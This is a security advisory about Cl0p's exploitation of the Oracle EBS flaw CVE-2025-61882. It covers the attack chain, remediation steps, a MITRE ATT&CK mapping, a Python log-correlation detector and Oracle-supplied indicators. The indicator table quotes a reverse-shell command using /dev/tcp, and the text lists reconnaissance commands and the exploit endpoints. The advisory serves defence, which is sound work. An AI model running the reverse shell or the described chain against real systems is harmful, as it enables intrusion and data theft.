Customer Advisory: Oracle EBS Zero-Day Exploitation by Graceful Spider

By Adversary Tactics and Intelligence Group

Estimated Reading Time: 9 minutes

Oracle EBS – Cl0p – CVE-2025-61882 – GracefulSpider – Remote Code Execution – Unauthorized Access Vulnerability – Extortion – Data Exfiltration

Source Material: Oracle, NIST, CrowdStrike | Targeted Industries: All

Executive Summary

A critical zero-day vulnerability in Oracle E-Business Suite (EBS), tracked as CVE-2025-61882, allows unauthenticated remote code execution. Multiple cybersecurity firms, including CrowdStrike and Mandiant, have tied the exploitation of this flaw to Graceful Spider (aka the Cl0p ransomware group), who subsequently sent high-volume extortion emails to victim executives claiming data theft. Oracle released an emergency patch and security alert, strongly recommending immediate updates due to the critical nature of the flaw and the confirmation of in-the-wild exploitation. Additionally, the public disclosure of an exploit by a Telegram channel linked to other threat groups, such as Scattered Spider, has raised concerns about widespread, opportunistic exploitation of unpatched, internet-exposed EBS applications.

Threat Overview and Strategic Impact

The financially motivated threat actor group known as Graceful Spider, or Cl0p, is leading a mass exploitation campaign targeting a critical zero-day vulnerability affecting Oracle E-Business Suite (EBS), CVE-2025-61882. The campaign’s primary objective is large-scale data exfiltration to fuel an aggressive extortion operation, creating a significant financial and reputational risk for any organization dependent on this widely used enterprise software.

The first known exploitation of this vulnerability occurred on August 9, 2025, indicating that threat actors had access to this zero-day flaw for nearly two months before its public disclosure. The malicious activity escalated into a high-volume extortion campaign starting around September 29, 2025, utilizing emails sent from hundreds of compromised accounts to executives, claiming data theft and demanding ransoms reportedly reaching up to $50 million. 

This campaign is defined by a combination of a highly critical vulnerability, a notorious and skilled primary threat actor, and a complex ecosystem of other cybercriminal groups. The core details are summarized below:

  • Vulnerability: CVE-2025-61882 is a critical unauthenticated Remote Code Execution (RCE) vulnerability with a CVSS score of 9.8. It affects Oracle EBS versions 12.2.3 through 12.2.14, allowing an attacker to take full control of a vulnerable system over the network without needing valid credentials.
  • Primary Attributed Actor: We assess with moderate confidence that the financially motivated threat actor Graceful Spider is the principal driver of this campaign. This group is notorious for exploiting zero-day vulnerabilities in common enterprise systems to steal sensitive data.
  • Primary Objective: The actor’s goal is data theft followed by extortion. This is evidenced by a high-volume email campaign targeting company executives with claims of data exfiltration and ransom demands reportedly reaching as high as $50 million.

The public disclosure of a proof-of-concept (POC) exploit and the vulnerability patch on October 3-4, 2025, significantly heightens immediate risk. With the PoC exploit now publicly available, we assess with moderate confidence that other threat actors will quickly develop their own weaponized versions. This will almost certainly shift the threat from targeted attacks by a single sophisticated group to widespread, opportunistic exploitation by a broader range of adversaries, increasing the overall risk for any unpatched organization.

The public friction between Graceful Spider and the Scattered Spider/ShinyHunters collective complicates simple attribution. Their simultaneous exploit sharing and public criticism suggest a competitive and fractured cybercrime environment rather than a purely collaborative one. This makes it more difficult to predict adversary behavior and motives.

The focus on Oracle EBS is a clear indicator of a strategic shift by attackers toward core enterprise applications. These systems are high-value targets because they act as central repositories for an organization’s most sensitive financial, operational, and customer data, making them ideal for high-impact data exfiltration and extortion campaigns.

If you have questions or feedback about this intelligence, you can submit them here.

Security Hardening and Actions

Organizations must take immediate, decisive action to prevent and mitigate this critical exposure. Oracle issued an emergency patch for CVE-2025-61882, strongly recommending customers apply these updates as soon as possible. Applying the October 2023 Critical Patch Update is a prerequisite. The U.S. CISA added this vulnerability to its Known Exploited Vulnerabilities catalog, underscoring the urgent need for remediation.

  • Patch Application. Oracle strongly recommends applying the security updates for CVE-2025-61882 as soon as possible. Note that the October 2023 Critical Patch Update is a mandatory prerequisite for installing this emergency patch.
  • Compromise Assessment. Conduct urgent threat hunting activities to search for evidence of exploitation. Technical teams should focus on the following:
    1. Investigate all outbound connections originating from Oracle EBS instances, paying special attention to traffic over port 443 to unknown or suspicious destinations.
    2. Search for malicious templates within the xdo_templates_vl database table. It is recommended to work directly with the Oracle database administrator for this task.
    3. Investigate for suspicious sessions in icx_sessions associated with UserID 0 (sysadmin) and UserID 6 (guest), which may indicate unauthorized access.

Implement these long-term measures to reduce the organization’s attack surface and improve its overall security posture.

  • Minimize the internet-facing attack surface of all Oracle EBS instances wherever possible.
  • Consider temporarily disabling internet access for exposed Oracle EBS services until they are fully patched and a thorough compromise assessment has been completed.
  • Implement and properly configure a Web Application Firewall (WAF) in front of EBS instances to provide an additional layer of defense against web-based exploits.
  • Enforce SSO and Multi-Factor Authentication (MFA) to prevent unauthorized access via local account password resets. 

Deepwatch Detections

Deepwatch detections provide visibility into common post-exploitation techniques, helping to quickly identify and address a threat actor within the environment. More information on Deepwatch’s detections for this threat can be found on our Customer Security Portal.

Technical Artifacts 

The tactics described in this advisory are all enabled by the core vulnerability itself, which provides the initial foothold for the entire attack chain. Because the exploitation window opened in August, security teams must conduct comprehensive threat hunting and compromise assessments using the Indicators of Compromise (IOCs) provided by Oracle. Specific hunting activities include searching EBS databases for malicious templates in xdo_templates_vl and investigating suspicious sessions associated with UserID 0 (sysadmin) and UserID 6 (guest) in icx_sessions.

The attack targets Oracle EBS versions 12.2.3–12.2.14, exploiting the BI Publisher Integration component of Oracle Concurrent Processing. The multi-step exploit chain initiates an authentication bypass using an HTTP POST request directed at /OA_HTML/SyncServlet. Adversaries subsequently target the XML Publisher Template Manager by issuing requests to upload and execute a malicious XSLT template. Successful command execution establishes an outbound connection over port 443 to attacker-controlled infrastructure, subsequently used to remotely load web shells for command execution and persistence. 

The observed attack methodology follows a multi-step process designed to gain initial access, execute code, and establish long-term persistence on the target system.

  1. Authentication Bypass: The attack begins with a specially crafted HTTP POST request sent to the /OA_HTML/SyncServlet endpoint. This action initiates an authentication bypass, which in at least one observed case was related to a privileged administrative account within the EBS environment.
  2. Remote Code Execution: Once inside, the adversary targets Oracle’s XML Publisher Template Manager. Using GET and POST requests to /OA_HTML/RF.jsp and /OA_HTML/OA.jsp, they upload a malicious XSLT template. The embedded malicious commands are executed when the system “previews” the template.
  3. Command and Control (C2): Successful code execution establishes an outbound connection from the compromised server to attacker-controlled infrastructure. This communication channel is typically established over port 443 to blend in with legitimate encrypted web traffic.
  4. Persistence and Payload Delivery: The C2 channel is used to remotely load web shells onto the compromised server, providing the attacker with persistent access. In one incident, this was achieved through a two-step process: first, a downloader (FileUtils.java) was loaded, which then fetched a backdoor (Log4jConfigQpgsubFilter.java) to create a memory-resident web shell, making it more difficult to detect.
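As an added illustration (not code from the advisory, Oracle, or Deepwatch), the following Python correlates the first two steps of the chain above in Apache/OHS-style access logs: a POST to /OA_HTML/SyncServlet followed, within a short window, by requests to the Template Manager JSPs from the same client. The log lines are constructed, and the common-log format and ten-minute window are assumptions; RF.jsp and OA.jsp also serve legitimate EBS traffic, so the correlation with the SyncServlet POST is what reduces noise.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in Apache/OHS common log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [09/Aug/2025:10:01:02 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 512
203.0.113.10 - - [09/Aug/2025:10:01:09 +0000] "GET /OA_HTML/RF.jsp?function_id=1 HTTP/1.1" 200 2048
203.0.113.10 - - [09/Aug/2025:10:01:15 +0000] "POST /OA_HTML/OA.jsp HTTP/1.1" 200 1024
198.51.100.7 - - [09/Aug/2025:10:02:00 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 4096
198.51.100.7 - - [09/Aug/2025:10:02:30 +0000] "GET /OA_HTML/RF.jsp HTTP/1.1" 200 2048
"""

# Common log format: client, identd, user, [timestamp], "METHOD path proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

BYPASS_PATH = "/OA_HTML/SyncServlet"                        # step 1 of the chain
TEMPLATE_PATHS = {"/OA_HTML/RF.jsp", "/OA_HTML/OA.jsp"}     # step 2 of the chain


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FMT)
    entry["path"] = entry["path"].split("?", 1)[0]  # ignore the query string
    return entry


def find_exploit_chains(lines, window=timedelta(minutes=10)):
    """Return {client_ip: [template-manager paths]} for clients that POSTed to
    SyncServlet and then requested RF.jsp/OA.jsp within `window` (assumed)."""
    bypass_at = {}            # client ip -> time of its most recent SyncServlet POST
    hits = defaultdict(list)  # client ip -> template-manager paths seen afterwards
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        ip, path = e["ip"], e["path"]
        if e["method"] == "POST" and path == BYPASS_PATH:
            bypass_at[ip] = e["ts"]
        elif path in TEMPLATE_PATHS and ip in bypass_at and e["ts"] - bypass_at[ip] <= window:
            hits[ip].append(path)
    return dict(hits)


if __name__ == "__main__":
    for ip, paths in find_exploit_chains(SAMPLE_LOG.splitlines()).items():
        print(f"possible CVE-2025-61882 chain from {ip}: {paths}")
```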

The following IOCs, provided by Oracle, can be used by technical teams for detection and threat hunting activities.

Indicator Type | Value | Description
--- | --- | ---
IP Address | 200.107.207.26 | Potential GET and POST activity observed.
IP Address | 185.181.60.11 | Potential GET and POST activity observed.
Command | sh -c /bin/bash -i >& /dev/tcp/ / 0>&1 | Establish an outbound TCP connection over a specific port.
SHA256 Hash | 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
SHA256 Hash | aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
SHA256 Hash | 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Threat Object Mapping

Intrusion Set:

  • Graceful Spider, also known as Cl0p ransomware group.

Attack Pattern (MITRE ATT&CK):

Tactic | Technique | Technique ID | Associated Threat Activity
--- | --- | --- | ---
Initial Access | Exploitation of Remote Services (Zero-Day) | T1190 | Adversaries exploited CVE-2025-61882, a critical vulnerability enabling unauthenticated remote code execution (RCE) in Oracle EBS versions 12.2.3–12.2.14. The first known exploitation began on August 9, 2025.
Defense Evasion | Authentication Bypass | TA0005 | The activity typically started with an HTTP POST request sent to /OA_HTML/SyncServlet, initiating the authentication-bypass phase of the exploit chain. This bypass mechanism was observed exploiting an administrative account within EBS in at least one incident.
Credential Access | Abuse of Local Accounts / Password Reset | TA0006 | Threat actors gained valid credentials by abusing the default password reset function on internet-exposed Oracle EBS portals. This process involved leveraging compromised email accounts to trigger password resets on local EBS accounts, bypassing mandated SSO and MFA protections.
Execution | Remote Code Execution via XSLT Template | T1059.008 | The adversary achieved RCE by targeting Oracle’s XML Publisher Template Manager. This involved issuing GET and POST requests to /OA_HTML/RF.jsp and /OA_HTML/OA.jsp to upload and execute a malicious XSLT template. Commands embedded in the malicious template executed when the template was previewed.
Execution | Injection Techniques (SSRF and CRLF) | T1059.008 | The underlying attack chain leveraged Server-Side Request Forgery (SSRF) and Carriage Return/Line Feed (CRLF) injection to force EBS servers to fetch and execute malicious XSL payloads.
Discovery | System Information Discovery | T1082 | Observed commands associated with the exploitation activity included basic system commands used for discovery, such as cat /etc/fstab, cat /etc/hosts, df -h, ip addr, and cat /proc/net/arp.
Command and Control | Standard Application Layer Protocol: Web Protocols | T1071.001 | Successful template execution established an outbound connection from the Java web server process to adversary-controlled infrastructure over port 443.
Persistence | Web Shell Deployment | T1505.003 | Following the RCE, the adversary used the outbound connection to remotely load web shell(s) for command execution and persistence. In one case, a web shell was set up using FileUtils.java (downloader) and Log4jConfigQpgsubFilter.java (backdoor), invoked through a filter chain via a public-facing help endpoint.
Exfiltration | Exfiltration Over Web Service | T1567 | The core purpose of the campaign was data exfiltration from the Oracle EBS applications.
Impact | Extortion | TA0040 | Graceful Spider (Cl0p) sent high-volume extortion emails, leveraging their Clop branding, claiming sensitive data theft. Reported ransom demands reached up to $50 million.

Vulnerability:

  • CVE-2025-61882

Malware/Tool:

  • Webshells:
    • FileUtils.java (downloader)
    • Log4jConfigQpgsubFilter.java (backdoor)
